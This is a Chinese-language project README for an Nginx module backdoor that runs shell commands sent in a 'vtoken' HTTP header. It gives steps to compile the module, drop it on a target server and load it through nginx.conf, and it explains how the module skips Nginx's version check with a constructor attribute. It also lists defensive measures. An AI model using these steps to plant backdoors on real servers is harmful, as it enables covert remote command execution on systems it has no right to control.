本项目不含有完整的利用工具,仅提供无害化测试程序、防御加固方案,以及研究思路讨论
测试环境:Nginx 1.18.0
下载测试程序 releases
将下载的so放至目标服务器上,修改 nginx.conf 配置文件在第一行添加以下内容,path为路径
load_module path/ngx_http_cre_module.so;
然后重载nginx
nignx -s reload
POST HTTP header vtoken: whoami
(测试程序只允许使用 whoami
命令)
wget https://nginx.org/download/nginx-1.18.0.tar.gz
tar -zxvf nginx-1.18.0.tar.gz
cd nginx-1.18.0
git clone https://github.com/veo/nginx_shell.git
./configure --with-compat --add-dynamic-module=./nginx_shell/
make modules
编译后的so文件位于 nginx-1.18.0/objs/ngx_http_cre_module.so
- 无需临时编译(传统的 nignx so backdoor 需要临时编译)
- 兼容 1.9.11 以后的所有版本
- 无需额外组件支持
- 有so文件落地
- 需要 nignx -s reload 权限
nginx module 支持动态加载so,通过 __attribute ((constructor))的方式绕过nginx module version check,可以编译出适应所有nginx版本的module。 使用header_filter可以取得命令执行的参数,通过body_filter可以返回命令执行后的结果
-
绕过nginx对于module的版本检测
通过 __attribute ((constructor))的方式绕过
-
编写的module要兼容大部分版本
使用较早版本的函数,不使用高版本新增函数
-
目标编译参数 --without-http-cache 不一致会导致 ngx_http_request_s 结构体变化,程序无法正常使用
编译了两个版本支持不同的编译环境
- 监测Nginx Module的加载,Nginx进程的行为
- 查杀落地文件
- 收敛 nignx -s reload 权限